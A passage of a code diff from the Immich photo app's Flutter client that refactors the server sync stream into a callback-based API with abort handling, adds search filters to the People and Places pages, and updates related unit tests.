+    return _syncTask!.whenComplete(() {
+      _syncTask = null;
     });
   }
 }
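`BackgroundSyncManager` coalesces concurrent callers: while a task is in flight, later calls get the same future instead of spawning another isolate, and the slot is cleared when the task settles. A generic sketch of that guard, with a hypothetical `SingleFlight` name that is not from the codebase:

```dart
class SingleFlight<T> {
  Future<T>? _inFlight;

  // Runs action unless one is already running; concurrent callers share the
  // same future, and the slot is cleared once the task completes either way.
  Future<T> run(Future<T> Function() action) {
    final existing = _inFlight;
    if (existing != null) {
      return existing;
    }
    _inFlight = action().whenComplete(() => _inFlight = null);
    return _inFlight!;
  }
}
```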
@@ -12,22 +12,22 @@ import 'package:openapi/api.dart';
 class SyncApiRepository implements ISyncApiRepository {
   final Logger _logger = Logger('SyncApiRepository');
   final ApiService _api;
-  final int _batchSize;
-  SyncApiRepository(this._api, {int batchSize = kSyncEventBatchSize})
-      : _batchSize = batchSize;
-
-  @override
-  Stream<List<SyncEvent>> getSyncEvents(List<SyncRequestType> type) {
-    return _getSyncStream(SyncStreamDto(types: type));
-  }
+  SyncApiRepository(this._api);

   @override
   Future<void> ack(List<String> data) {
     return _api.syncApi.sendSyncAck(SyncAckSetDto(acks: data));
   }

-  Stream<List<SyncEvent>> _getSyncStream(SyncStreamDto dto) async* {
-    final client = http.Client();
+  @override
+  Future<void> streamChanges(
+    Function(List<SyncEvent>, Function() abort) onData, {
+    int batchSize = kSyncEventBatchSize,
+    http.Client? httpClient,
+  }) async {
+    // ignore: avoid-unused-assignment
+    final stopwatch = Stopwatch()..start();
+    final client = httpClient ?? http.Client();
     final endpoint = "${_api.apiClient.basePath}/sync/stream";

     final headers = {
@@ -35,20 +35,38 @@ class SyncApiRepository implements ISyncApiRepository {
       'Accept': 'application/jsonlines+json',
     };

-    final queryParams = <QueryParam>[];
     final headerParams = <String, String>{};
-    await _api.applyToParams(queryParams, headerParams);
+    await _api.applyToParams([], headerParams);
     headers.addAll(headerParams);

     final request = http.Request('POST', Uri.parse(endpoint));
     request.headers.addAll(headers);
-    request.body = jsonEncode(dto.toJson());
+    request.body = jsonEncode(
+      SyncStreamDto(
+        types: [
+          SyncRequestType.usersV1,
+          SyncRequestType.partnersV1,
+          SyncRequestType.assetsV1,
+          SyncRequestType.partnerAssetsV1,
+          SyncRequestType.assetExifsV1,
+          SyncRequestType.partnerAssetExifsV1,
+        ],
+      ).toJson(),
+    );

     String previousChunk = '';
     List<String> lines = [];

+    bool shouldAbort = false;
+
+    void abort() {
+      _logger.warning("Abort requested, stopping sync stream");
+      shouldAbort = true;
+    }
+
     try {
-      final response = await client.send(request);
+      final response =
+          await client.send(request).timeout(const Duration(seconds: 20));

       if (response.statusCode != 200) {
         final errorBody = await response.stream.bytesToString();
@@ -59,27 +77,38 @@ class SyncApiRepository implements ISyncApiRepository {
       }

       await for (final chunk in response.stream.transform(utf8.decoder)) {
+        if (shouldAbort) {
+          break;
+        }
+
         previousChunk += chunk;
         final parts = previousChunk.toString().split('\n');
         previousChunk = parts.removeLast();
         lines.addAll(parts);

-        if (lines.length < _batchSize) {
+        if (lines.length < batchSize) {
           continue;
         }

-        yield _parseSyncResponse(lines);
+        await onData(_parseLines(lines), abort);
         lines.clear();
       }
-    } finally {
-      if (lines.isNotEmpty) {
-        yield _parseSyncResponse(lines);
+
+      if (lines.isNotEmpty && !shouldAbort) {
+        await onData(_parseLines(lines), abort);
       }
+    } catch (error, stack) {
+      _logger.severe("error processing stream", error, stack);
+      return Future.error(error, stack);
+    } finally {
       client.close();
     }
+
+    stopwatch.stop();
+    _logger
+        .info("Remote Sync completed in ${stopwatch.elapsed.inMilliseconds}ms");
   }

-  List<SyncEvent> _parseSyncResponse(List<String> lines) {
+  List<SyncEvent> _parseLines(List<String> lines) {
     final List<SyncEvent> data = [];

     for (final line in lines) {
@@ -110,4 +139,10 @@ const _kResponseMap = <SyncEntityType, Function(dynamic)>{
   SyncEntityType.userDeleteV1: SyncUserDeleteV1.fromJson,
   SyncEntityType.partnerV1: SyncPartnerV1.fromJson,
   SyncEntityType.partnerDeleteV1: SyncPartnerDeleteV1.fromJson,
+  SyncEntityType.assetV1: SyncAssetV1.fromJson,
+  SyncEntityType.assetDeleteV1: SyncAssetDeleteV1.fromJson,
+  SyncEntityType.assetExifV1: SyncAssetExifV1.fromJson,
+  SyncEntityType.partnerAssetV1: SyncAssetV1.fromJson,
+  SyncEntityType.partnerAssetDeleteV1: SyncAssetDeleteV1.fromJson,
+  SyncEntityType.partnerAssetExifV1: SyncAssetExifV1.fromJson,
 };
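The repository reads the response as newline-delimited JSON: each decoded chunk is appended to a buffer, complete lines are split off, and the trailing partial line is carried into the next chunk before `_parseLines` runs. A standalone sketch of that reassembly step, illustrative only:

```dart
// Reassembles newline-delimited records from arbitrary chunk boundaries,
// mirroring the previousChunk/parts bookkeeping in streamChanges above.
Iterable<String> linesFromChunks(Iterable<String> chunks) sync* {
  var buffer = '';
  for (final chunk in chunks) {
    buffer += chunk;
    final parts = buffer.split('\n');
    // the last element is an incomplete line (possibly empty); keep it
    buffer = parts.removeLast();
    yield* parts;
  }
  if (buffer.isNotEmpty) yield buffer;
}

void main() {
  final chunks = ['{"a":1}\n{"b"', ':2}\n{"c":3}'];
  print(linesFromChunks(chunks).toList());
  // [{"a":1}, {"b":2}, {"c":3}]
}
```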
@@ -1,4 +1,5 @@
 import 'package:drift/drift.dart';
+import 'package:flutter/foundation.dart';
 import 'package:immich_mobile/domain/interfaces/sync_stream.interface.dart';
 import 'package:immich_mobile/extensions/string_extensions.dart';
 import 'package:immich_mobile/infrastructure/entities/partner.entity.drift.dart';
@@ -15,7 +16,7 @@ class DriftSyncStreamRepository extends DriftDatabaseRepository
   DriftSyncStreamRepository(super.db) : _db = db;

   @override
-  Future<bool> deleteUsersV1(Iterable<SyncUserDeleteV1> data) async {
+  Future<void> deleteUsersV1(Iterable<SyncUserDeleteV1> data) async {
     try {
       await _db.batch((batch) {
         for (final user in data) {
@@ -25,15 +26,14 @@ class DriftSyncStreamRepository extends DriftDatabaseRepository
           );
         }
       });
-      return true;
-    } catch (e, s) {
-      _logger.severe('Error while processing SyncUserDeleteV1', e, s);
-      return false;
+    } catch (error, stack) {
+      _logger.severe('Error while processing SyncUserDeleteV1', error, stack);
+      rethrow;
     }
   }

   @override
-  Future<bool> updateUsersV1(Iterable<SyncUserV1> data) async {
+  Future<void> updateUsersV1(Iterable<SyncUserV1> data) async {
     try {
       await _db.batch((batch) {
         for (final user in data) {
@@ -49,15 +49,14 @@ class DriftSyncStreamRepository extends DriftDatabaseRepository
           );
         }
       });
-      return true;
-    } catch (e, s) {
-      _logger.severe('Error while processing SyncUserV1', e, s);
-      return false;
+    } catch (error, stack) {
+      _logger.severe('Error while processing SyncUserV1', error, stack);
+      rethrow;
     }
   }

   @override
-  Future<bool> deletePartnerV1(Iterable<SyncPartnerDeleteV1> data) async {
+  Future<void> deletePartnerV1(Iterable<SyncPartnerDeleteV1> data) async {
     try {
       await _db.batch((batch) {
         for (final partner in data) {
@@ -70,15 +69,14 @@ class DriftSyncStreamRepository extends DriftDatabaseRepository
           );
         }
       });
-      return true;
     } catch (e, s) {
       _logger.severe('Error while processing SyncPartnerDeleteV1', e, s);
-      return false;
+      rethrow;
     }
   }

   @override
-  Future<bool> updatePartnerV1(Iterable<SyncPartnerV1> data) async {
+  Future<void> updatePartnerV1(Iterable<SyncPartnerV1> data) async {
     try {
       await _db.batch((batch) {
         for (final partner in data) {
@@ -95,10 +93,42 @@ class DriftSyncStreamRepository extends DriftDatabaseRepository
           );
         }
       });
-      return true;
     } catch (e, s) {
       _logger.severe('Error while processing SyncPartnerV1', e, s);
-      return false;
+      rethrow;
     }
   }
+
+  // Assets
+  @override
+  Future<void> updateAssetsV1(Iterable<SyncAssetV1> data) async {
+    debugPrint("updateAssetsV1 - ${data.length}");
+  }
+
+  @override
+  Future<void> deleteAssetsV1(Iterable<SyncAssetDeleteV1> data) async {
+    debugPrint("deleteAssetsV1 - ${data.length}");
+  }
+
+  // Partner Assets
+  @override
+  Future<void> updatePartnerAssetsV1(Iterable<SyncAssetV1> data) async {
+    debugPrint("updatePartnerAssetsV1 - ${data.length}");
+  }
+
+  @override
+  Future<void> deletePartnerAssetsV1(Iterable<SyncAssetDeleteV1> data) async {
+    debugPrint("deletePartnerAssetsV1 - ${data.length}");
+  }
+
+  // EXIF
+  @override
+  Future<void> updateAssetsExifV1(Iterable<SyncAssetExifV1> data) async {
+    debugPrint("updateAssetsExifV1 - ${data.length}");
+  }
+
+  @override
+  Future<void> updatePartnerAssetsExifV1(Iterable<SyncAssetExifV1> data) async {
+    debugPrint("updatePartnerAssetsExifV1 - ${data.length}");
+  }
 }
@@ -4,11 +4,11 @@ import 'package:flutter/material.dart';
 import 'package:flutter_hooks/flutter_hooks.dart';
 import 'package:hooks_riverpod/hooks_riverpod.dart';
 import 'package:immich_mobile/extensions/build_context_extensions.dart';
-import 'package:immich_mobile/extensions/theme_extensions.dart';
 import 'package:immich_mobile/providers/search/people.provider.dart';
 import 'package:immich_mobile/routing/router.dart';
 import 'package:immich_mobile/services/api.service.dart';
 import 'package:immich_mobile/utils/image_url_builder.dart';
+import 'package:immich_mobile/widgets/common/search_field.dart';
 import 'package:immich_mobile/widgets/search/person_name_edit_form.dart';

 @RoutePage()
@@ -42,47 +42,12 @@ class PeopleCollectionPage extends HookConsumerWidget {
       appBar: AppBar(
         automaticallyImplyLeading: search.value == null,
         title: search.value != null
-            ? TextField(
+            ? SearchField(
                 focusNode: formFocus,
                 onTapOutside: (_) => formFocus.unfocus(),
                 onChanged: (value) => search.value = value,
-                decoration: InputDecoration(
-                  contentPadding: const EdgeInsets.only(left: 24),
                 filled: true,
-                  fillColor: context.primaryColor.withValues(alpha: 0.1),
-                  hintStyle: context.textTheme.bodyLarge?.copyWith(
-                    color: context.themeData.colorScheme.onSurfaceSecondary,
-                  ),
-                  border: OutlineInputBorder(
-                    borderRadius: BorderRadius.circular(25),
-                    borderSide: BorderSide(
-                      color: context.colorScheme.surfaceContainerHighest,
-                    ),
-                  ),
-                  enabledBorder: OutlineInputBorder(
-                    borderRadius: BorderRadius.circular(25),
-                    borderSide: BorderSide(
-                      color: context.colorScheme.surfaceContainerHighest,
-                    ),
-                  ),
-                  disabledBorder: OutlineInputBorder(
-                    borderRadius: BorderRadius.circular(25),
-                    borderSide: BorderSide(
-                      color: context.colorScheme.surfaceContainerHighest,
-                    ),
-                  ),
-                  focusedBorder: OutlineInputBorder(
-                    borderRadius: BorderRadius.circular(25),
-                    borderSide: BorderSide(
-                      color: context.colorScheme.primary.withAlpha(150),
-                    ),
-                  ),
-                  prefixIcon: Icon(
-                    Icons.search_rounded,
-                    color: context.colorScheme.primary,
-                  ),
                 hintText: 'filter_people'.tr(),
-                ),
                 autofocus: true,
               )
             : Text('people'.tr()),
@@ -2,6 +2,7 @@ import 'package:auto_route/auto_route.dart';
 import 'package:cached_network_image/cached_network_image.dart';
 import 'package:easy_localization/easy_localization.dart';
 import 'package:flutter/material.dart';
+import 'package:flutter_hooks/flutter_hooks.dart' hide Store;
 import 'package:hooks_riverpod/hooks_riverpod.dart';
 import 'package:immich_mobile/domain/models/store.model.dart';
 import 'package:immich_mobile/entities/asset.entity.dart';
@@ -12,6 +13,7 @@ import 'package:immich_mobile/pages/common/large_leading_tile.dart';
 import 'package:immich_mobile/providers/search/search_page_state.provider.dart';
 import 'package:immich_mobile/routing/router.dart';
 import 'package:immich_mobile/services/api.service.dart';
+import 'package:immich_mobile/widgets/common/search_field.dart';
 import 'package:immich_mobile/widgets/map/map_thumbnail.dart';
 import 'package:maplibre_gl/maplibre_gl.dart';

@@ -21,14 +23,35 @@ class PlacesCollectionPage extends HookConsumerWidget {
   @override
   Widget build(BuildContext context, WidgetRef ref) {
     final places = ref.watch(getAllPlacesProvider);
+    final formFocus = useFocusNode();
+    final ValueNotifier<String?> search = useState(null);

     return Scaffold(
       appBar: AppBar(
-        title: Text('places'.tr()),
+        automaticallyImplyLeading: search.value == null,
+        title: search.value != null
+            ? SearchField(
+                autofocus: true,
+                filled: true,
+                focusNode: formFocus,
+                onChanged: (value) => search.value = value,
+                onTapOutside: (_) => formFocus.unfocus(),
+                hintText: 'filter_places'.tr(),
+              )
+            : Text('places'.tr()),
+        actions: [
+          IconButton(
+            icon: Icon(search.value != null ? Icons.close : Icons.search),
+            onPressed: () {
+              search.value = search.value == null ? '' : null;
+            },
+          ),
+        ],
       ),
       body: ListView(
         shrinkWrap: true,
         children: [
+          if (search.value == null)
           Padding(
             padding: const EdgeInsets.all(16.0),
             child: SizedBox(
@@ -49,6 +72,13 @@ class PlacesCollectionPage extends HookConsumerWidget {
           ),
           places.when(
             data: (places) {
+              if (search.value != null) {
+                places = places.where((place) {
+                  return place.label
+                      .toLowerCase()
+                      .contains(search.value!.toLowerCase());
+                }).toList();
+              }
               return ListView.builder(
                 shrinkWrap: true,
                 physics: const NeverScrollableScrollPhysics(),
@@ -2,7 +2,6 @@ import 'dart:async';

 import 'package:auto_route/auto_route.dart';
 import 'package:easy_localization/easy_localization.dart';
-import 'package:flutter/foundation.dart';
 import 'package:flutter/material.dart';
 import 'package:flutter_hooks/flutter_hooks.dart';
 import 'package:hooks_riverpod/hooks_riverpod.dart';
@@ -14,7 +13,6 @@ import 'package:immich_mobile/providers/server_info.provider.dart';
 import 'package:immich_mobile/providers/timeline.provider.dart';
 import 'package:immich_mobile/providers/user.provider.dart';
 import 'package:immich_mobile/providers/websocket.provider.dart';
-import 'package:immich_mobile/routing/router.dart';
 import 'package:immich_mobile/widgets/asset_grid/multiselect_grid.dart';
 import 'package:immich_mobile/widgets/common/immich_app_bar.dart';
 import 'package:immich_mobile/widgets/common/immich_loading_indicator.dart';
@@ -130,15 +128,7 @@ class PhotosPage extends HookConsumerWidget {
             child: Container(
               height: kToolbarHeight + context.padding.top,
               color: context.themeData.appBarTheme.backgroundColor,
-              child: ImmichAppBar(
-                actions: [
-                  if (kDebugMode)
-                    IconButton(
-                      icon: const Icon(Icons.science_rounded),
-                      onPressed: () => context.pushRoute(const FeatInDevRoute()),
-                    ),
-                ],
-              ),
+              child: const ImmichAppBar(),
             ),
           ),
         ],
@@ -9,12 +9,12 @@ final _features = [
   _Features(
     name: 'Sync Local',
     icon: Icons.photo_album_rounded,
-    onTap: (ref) => ref.read(backgroundSyncProvider).syncDeviceAlbums(),
+    onTap: (ref) => ref.read(backgroundSyncProvider).syncLocal(),
   ),
   _Features(
     name: 'Sync Remote',
     icon: Icons.refresh_rounded,
-    onTap: (ref) => ref.read(backgroundSyncProvider).syncUsers(),
+    onTap: (ref) => ref.read(backgroundSyncProvider).syncRemote(),
   ),
 ];

@@ -1,5 +1,6 @@
 import 'package:auto_route/auto_route.dart';
 import 'package:easy_localization/easy_localization.dart';
+import 'package:flutter/foundation.dart';
 import 'package:flutter/material.dart';
 import 'package:flutter_svg/svg.dart';
 import 'package:hooks_riverpod/hooks_riverpod.dart';
@@ -178,6 +179,12 @@ class ImmichAppBar extends ConsumerWidget implements PreferredSizeWidget {
               child: action,
             ),
           ),
+        if (kDebugMode)
+          IconButton(
+            icon: const Icon(Icons.science_rounded),
+            onPressed: () => context.pushRoute(const FeatInDevRoute()),
+          ),
         if (showUploadButton)
           Padding(
             padding: const EdgeInsets.only(right: 20),
@@ -2,3 +2,5 @@ import 'package:mocktail/mocktail.dart';
 import 'package:openapi/api.dart';

 class MockAssetsApi extends Mock implements AssetsApi {}
+
+class MockSyncApi extends Mock implements SyncApi {}
@@ -73,9 +73,9 @@ void main() {
       );
     });

-  group('syncAlbums', () {
+  group('sync', () {
     test('should return when no albums exist', () async {
-      await sut.syncAlbums();
+      await sut.sync();
       verify(() => mockAlbumMediaRepo.getAll()).called(1);
       verify(() => mockLocalAlbumRepo.getAll(sortBy: SortLocalAlbumsBy.id))
           .called(1);
@@ -104,7 +104,7 @@ void main() {
       when(() => mockAlbumMediaRepo.getAssetsForAlbum(deviceAlbums.first.id))
           .thenAnswer((_) async => [LocalAssetStub.image1]);

-      await sut.syncAlbums();
+      await sut.sync();

       verify(() => mockAlbumMediaRepo.getAll()).called(1);
       verify(() => mockLocalAlbumRepo.getAll(sortBy: SortLocalAlbumsBy.id))
@@ -127,7 +127,7 @@ void main() {
       when(() => mockLocalAlbumRepo.getAll(sortBy: SortLocalAlbumsBy.id))
           .thenAnswer((_) async => dbAlbums);

-      await sut.syncAlbums();
+      await sut.sync();

       verify(() => mockAlbumMediaRepo.getAll()).called(1);
       verify(() => mockLocalAlbumRepo.getAll(sortBy: SortLocalAlbumsBy.id))
@@ -159,7 +159,7 @@ void main() {
       when(() => mockLocalAlbumRepo.getAssetsForAlbum(commonAlbum.id))
           .thenAnswer((_) async => []); // DB has no assets initially

-      await sut.syncAlbums();
+      await sut.sync();

       verify(() => mockAlbumMediaRepo.getAll()).called(1);
       verify(() => mockLocalAlbumRepo.getAll(sortBy: SortLocalAlbumsBy.id))
@@ -206,7 +206,7 @@ void main() {
       when(() => mockAlbumMediaRepo.getAssetsForAlbum(albumToAdd.id))
           .thenAnswer((_) async => [LocalAssetStub.image1]);

-      await sut.syncAlbums();
+      await sut.sync();

       verify(() => mockAlbumMediaRepo.getAll()).called(1);
       verify(() => mockLocalAlbumRepo.getAll(sortBy: SortLocalAlbumsBy.id))
@@ -239,7 +239,7 @@ void main() {
       when(() => mockAlbumMediaRepo.getAll())
           .thenThrow(Exception("Device error"));

-      await sut.syncAlbums();
+      await sut.sync();

       verify(() => mockAlbumMediaRepo.getAll()).called(1);
       verifyNever(
@@ -1,4 +1,4 @@
-// ignore_for_file: avoid-unnecessary-futures, avoid-async-call-in-sync-function
+// ignore_for_file: avoid-declaring-call-method, avoid-unnecessary-futures

 import 'dart:async';

@@ -8,16 +8,22 @@ import 'package:immich_mobile/domain/interfaces/sync_stream.interface.dart';
 import 'package:immich_mobile/domain/models/sync_event.model.dart';
 import 'package:immich_mobile/domain/services/sync_stream.service.dart';
 import 'package:mocktail/mocktail.dart';
-import 'package:openapi/api.dart';
-import 'package:worker_manager/worker_manager.dart';

 import '../../fixtures/sync_stream.stub.dart';
 import '../../infrastructure/repository.mock.dart';

+class _AbortCallbackWrapper {
+  const _AbortCallbackWrapper();
+
+  bool call() => false;
+}
+
+class _MockAbortCallbackWrapper extends Mock implements _AbortCallbackWrapper {}
+
 class _CancellationWrapper {
   const _CancellationWrapper();

-  bool isCancelled() => false;
+  bool call() => false;
 }

 class _MockCancellationWrapper extends Mock implements _CancellationWrapper {}
@@ -26,418 +32,191 @@ void main() {
   late SyncStreamService sut;
   late ISyncStreamRepository mockSyncStreamRepo;
   late ISyncApiRepository mockSyncApiRepo;
-  late StreamController<List<SyncEvent>> streamController;
+  late Function(List<SyncEvent>, Function()) handleEventsCallback;
+  late _MockAbortCallbackWrapper mockAbortCallbackWrapper;

   successHandler(Invocation _) async => true;
-  failureHandler(Invocation _) async => false;

   setUp(() {
     mockSyncStreamRepo = MockSyncStreamRepository();
     mockSyncApiRepo = MockSyncApiRepository();
-    streamController = StreamController<List<SyncEvent>>.broadcast();
+    mockAbortCallbackWrapper = _MockAbortCallbackWrapper();
+
+    when(() => mockAbortCallbackWrapper()).thenReturn(false);
+
+    when(() => mockSyncApiRepo.streamChanges(any()))
+        .thenAnswer((invocation) async {
+      // ignore: avoid-unsafe-collection-methods
+      handleEventsCallback = invocation.positionalArguments.first;
+    });
+
+    when(() => mockSyncApiRepo.ack(any())).thenAnswer((_) async => {});
+
+    when(() => mockSyncStreamRepo.updateUsersV1(any()))
+        .thenAnswer(successHandler);
+    when(() => mockSyncStreamRepo.deleteUsersV1(any()))
+        .thenAnswer(successHandler);
+    when(() => mockSyncStreamRepo.updatePartnerV1(any()))
+        .thenAnswer(successHandler);
+    when(() => mockSyncStreamRepo.deletePartnerV1(any()))
+        .thenAnswer(successHandler);
+    when(() => mockSyncStreamRepo.updateAssetsV1(any()))
+        .thenAnswer(successHandler);
+    when(() => mockSyncStreamRepo.deleteAssetsV1(any()))
+        .thenAnswer(successHandler);
+    when(() => mockSyncStreamRepo.updateAssetsExifV1(any()))
+        .thenAnswer(successHandler);
+    when(() => mockSyncStreamRepo.updatePartnerAssetsV1(any()))
+        .thenAnswer(successHandler);
+    when(() => mockSyncStreamRepo.deletePartnerAssetsV1(any()))
+        .thenAnswer(successHandler);
+    when(() => mockSyncStreamRepo.updatePartnerAssetsExifV1(any()))
+        .thenAnswer(successHandler);

     sut = SyncStreamService(
       syncApiRepository: mockSyncApiRepo,
       syncStreamRepository: mockSyncStreamRepo,
     );
-
-    // Default stream setup - emits one batch and closes
-    when(() => mockSyncApiRepo.getSyncEvents(any()))
-        .thenAnswer((_) => streamController.stream);
-
-    // Default ack setup
-    when(() => mockSyncApiRepo.ack(any())).thenAnswer((_) async => {});
-
-    // Register fallbacks for mocktail verification
-    registerFallbackValue(<SyncUserV1>[]);
-    registerFallbackValue(<SyncPartnerV1>[]);
-    registerFallbackValue(<SyncUserDeleteV1>[]);
-    registerFallbackValue(<SyncPartnerDeleteV1>[]);
-
-    // Default successful repository calls
-    when(() => mockSyncStreamRepo.updateUsersV1(any()))
-        .thenAnswer(successHandler);
-    when(() => mockSyncStreamRepo.deleteUsersV1(any()))
-        .thenAnswer(successHandler);
-    when(() => mockSyncStreamRepo.updatePartnerV1(any()))
-        .thenAnswer(successHandler);
-    when(() => mockSyncStreamRepo.deletePartnerV1(any()))
-        .thenAnswer(successHandler);
   });

-  tearDown(() async {
-    if (!streamController.isClosed) {
-      await streamController.close();
-    }
-  });
-
-  // Helper to trigger sync and add events to the stream
-  Future<void> triggerSyncAndEmit(List<SyncEvent> events) async {
-    final future = sut.syncUsers(); // Start listening
-    await Future.delayed(Duration.zero); // Allow listener to attach
-    if (!streamController.isClosed) {
-      streamController.add(events);
-      await streamController.close(); // Close after emitting
-    }
-    await future; // Wait for processing to complete
+  Future<void> simulateEvents(List<SyncEvent> events) async {
+    await sut.sync();
+    await handleEventsCallback(events, mockAbortCallbackWrapper.call);
   }

-  group("SyncStreamService", () {
+  group("SyncStreamService - _handleEvents", () {
     test(
-      "completes successfully when stream emits data and handlers succeed",
+      "processes events and acks successfully when handlers succeed",
       () async {
         final events = [
-          ...SyncStreamStub.userEvents,
-          ...SyncStreamStub.partnerEvents,
+          SyncStreamStub.userDeleteV1,
+          SyncStreamStub.userV1Admin,
+          SyncStreamStub.userV1User,
+          SyncStreamStub.partnerDeleteV1,
+          SyncStreamStub.partnerV1,
         ];
-        final future = triggerSyncAndEmit(events);
-        await expectLater(future, completes);
-        // Verify ack includes last ack from each successfully handled type
-        verify(
-          () =>
-              mockSyncApiRepo.ack(any(that: containsAll(["5", "2", "4", "3"]))),
-        ).called(1);
+        await simulateEvents(events);
+
+        verifyInOrder([
+          () => mockSyncStreamRepo.deleteUsersV1(any()),
+          () => mockSyncApiRepo.ack(["2"]),
+          () => mockSyncStreamRepo.updateUsersV1(any()),
+          () => mockSyncApiRepo.ack(["5"]),
+          () => mockSyncStreamRepo.deletePartnerV1(any()),
+          () => mockSyncApiRepo.ack(["4"]),
+          () => mockSyncStreamRepo.updatePartnerV1(any()),
+          () => mockSyncApiRepo.ack(["3"]),
+        ]);
+        verifyNever(() => mockAbortCallbackWrapper());
       },
     );

-    test("completes successfully when stream emits an error", () async {
-      when(() => mockSyncApiRepo.getSyncEvents(any()))
-          .thenAnswer((_) => Stream.error(Exception("Stream Error")));
-      // Should complete gracefully without throwing
-      await expectLater(sut.syncUsers(), throwsException);
-      verifyNever(() => mockSyncApiRepo.ack(any())); // No ack on stream error
-    });
+    test("processes final batch correctly", () async {
+      final events = [
+        SyncStreamStub.userDeleteV1,
+        SyncStreamStub.userV1Admin,
+      ];
+
+      await simulateEvents(events);
+
+      verifyInOrder([
+        () => mockSyncStreamRepo.deleteUsersV1(any()),
+        () => mockSyncApiRepo.ack(["2"]),
+        () => mockSyncStreamRepo.updateUsersV1(any()),
+        () => mockSyncApiRepo.ack(["1"]),
+      ]);
+      verifyNever(() => mockAbortCallbackWrapper());
    });

-    test("throws when initial getSyncEvents call fails", () async {
-      final apiException = Exception("API Error");
-      when(() => mockSyncApiRepo.getSyncEvents(any())).thenThrow(apiException);
-      // Should rethrow the exception from the initial call
-      await expectLater(sut.syncUsers(), throwsA(apiException));
-      verifyNever(() => mockSyncApiRepo.ack(any()));
-    });
-
-    test(
-      "completes successfully when a repository handler throws an exception",
-      () async {
-        when(() => mockSyncStreamRepo.updateUsersV1(any()))
-            .thenThrow(Exception("Repo Error"));
-        final events = [
-          ...SyncStreamStub.userEvents,
-          ...SyncStreamStub.partnerEvents,
-        ];
-        // Should complete, but ack only for the successful types
-        await triggerSyncAndEmit(events);
-        // Only partner delete was successful by default setup
-        verify(() => mockSyncApiRepo.ack(["2", "4", "3"])).called(1);
-      },
-    );
-
-    test(
-      "completes successfully but sends no ack when all handlers fail",
-      () async {
-        when(() => mockSyncStreamRepo.updateUsersV1(any()))
-            .thenAnswer(failureHandler);
-        when(() => mockSyncStreamRepo.deleteUsersV1(any()))
-            .thenAnswer(failureHandler);
-        when(() => mockSyncStreamRepo.updatePartnerV1(any()))
-            .thenAnswer(failureHandler);
-        when(() => mockSyncStreamRepo.deletePartnerV1(any()))
-            .thenAnswer(failureHandler);
-
-        final events = [
-          ...SyncStreamStub.userEvents,
-          ...SyncStreamStub.partnerEvents,
-        ];
-        await triggerSyncAndEmit(events);
-        verifyNever(() => mockSyncApiRepo.ack(any()));
-      },
-    );
-
-    test("sends ack only for types where handler returns true", () async {
-      // Mock specific handlers: user update fails, user delete succeeds
-      when(() => mockSyncStreamRepo.updateUsersV1(any()))
-          .thenAnswer(failureHandler);
-      when(() => mockSyncStreamRepo.deleteUsersV1(any()))
-          .thenAnswer(successHandler);
-      // partner update fails, partner delete succeeds
-      when(() => mockSyncStreamRepo.updatePartnerV1(any()))
-          .thenAnswer(failureHandler);
-
-      final events = [
-        ...SyncStreamStub.userEvents,
-        ...SyncStreamStub.partnerEvents,
-      ];
-      await triggerSyncAndEmit(events);
-
-      // Expect ack only for userDeleteV1 (ack: "2") and partnerDeleteV1 (ack: "4")
-      verify(() => mockSyncApiRepo.ack(any(that: containsAll(["2", "4"]))))
-          .called(1);
-    });
+    test("does not process or ack when event list is empty", () async {
+      await simulateEvents([]);

-    test("does not process or ack when stream emits an empty list", () async {
|
|
||||||
final future = sut.syncUsers();
|
|
||||||
streamController.add([]); // Emit empty list
|
|
||||||
await streamController.close();
|
|
||||||
await future; // Wait for completion
|
|
||||||
|
|
||||||
verifyNever(() => mockSyncStreamRepo.updateUsersV1(any()));
|
verifyNever(() => mockSyncStreamRepo.updateUsersV1(any()));
|
||||||
verifyNever(() => mockSyncStreamRepo.deleteUsersV1(any()));
|
verifyNever(() => mockSyncStreamRepo.deleteUsersV1(any()));
|
||||||
verifyNever(() => mockSyncStreamRepo.updatePartnerV1(any()));
|
verifyNever(() => mockSyncStreamRepo.updatePartnerV1(any()));
|
||||||
verifyNever(() => mockSyncStreamRepo.deletePartnerV1(any()));
|
verifyNever(() => mockSyncStreamRepo.deletePartnerV1(any()));
|
||||||
|
verifyNever(() => mockAbortCallbackWrapper());
|
||||||
verifyNever(() => mockSyncApiRepo.ack(any()));
|
verifyNever(() => mockSyncApiRepo.ack(any()));
|
||||||
});
|
});
|
||||||
|
|
||||||
test("processes multiple batches sequentially using mutex", () async {
|
test("aborts and stops processing if cancelled during iteration", () async {
|
||||||
final completer1 = Completer<void>();
|
|
||||||
final completer2 = Completer<void>();
|
|
||||||
int callOrder = 0;
|
|
||||||
int handler1StartOrder = -1;
|
|
||||||
int handler2StartOrder = -1;
|
|
||||||
int handler1Calls = 0;
|
|
||||||
int handler2Calls = 0;
|
|
||||||
|
|
||||||
when(() => mockSyncStreamRepo.updateUsersV1(any())).thenAnswer((_) async {
|
|
||||||
handler1Calls++;
|
|
||||||
handler1StartOrder = ++callOrder;
|
|
||||||
await completer1.future;
|
|
||||||
return true;
|
|
||||||
});
|
|
||||||
when(() => mockSyncStreamRepo.updatePartnerV1(any()))
|
|
||||||
.thenAnswer((_) async {
|
|
||||||
handler2Calls++;
|
|
||||||
handler2StartOrder = ++callOrder;
|
|
||||||
await completer2.future;
|
|
||||||
return true;
|
|
||||||
});
|
|
||||||
|
|
||||||
final batch1 = SyncStreamStub.userEvents;
|
|
||||||
final batch2 = SyncStreamStub.partnerEvents;
|
|
||||||
|
|
||||||
final syncFuture = sut.syncUsers();
|
|
||||||
await pumpEventQueue();
|
|
||||||
|
|
||||||
streamController.add(batch1);
|
|
||||||
await pumpEventQueue();
|
|
||||||
// Small delay to ensure the first handler starts
|
|
||||||
await Future.delayed(const Duration(milliseconds: 20));
|
|
||||||
|
|
||||||
expect(handler1StartOrder, 1, reason: "Handler 1 should start first");
|
|
||||||
expect(handler1Calls, 1);
|
|
||||||
|
|
||||||
streamController.add(batch2);
|
|
||||||
await pumpEventQueue();
|
|
||||||
// Small delay
|
|
||||||
await Future.delayed(const Duration(milliseconds: 20));
|
|
||||||
|
|
||||||
expect(handler2StartOrder, -1, reason: "Handler 2 should wait");
|
|
||||||
expect(handler2Calls, 0);
|
|
||||||
|
|
||||||
completer1.complete();
|
|
||||||
await pumpEventQueue(times: 40);
|
|
||||||
// Small delay to ensure the second handler starts
|
|
||||||
await Future.delayed(const Duration(milliseconds: 20));
|
|
||||||
|
|
||||||
expect(handler2StartOrder, 2, reason: "Handler 2 should start after H1");
|
|
||||||
expect(handler2Calls, 1);
|
|
||||||
|
|
||||||
completer2.complete();
|
|
||||||
await pumpEventQueue(times: 40);
|
|
||||||
// Small delay before closing the stream
|
|
||||||
await Future.delayed(const Duration(milliseconds: 20));
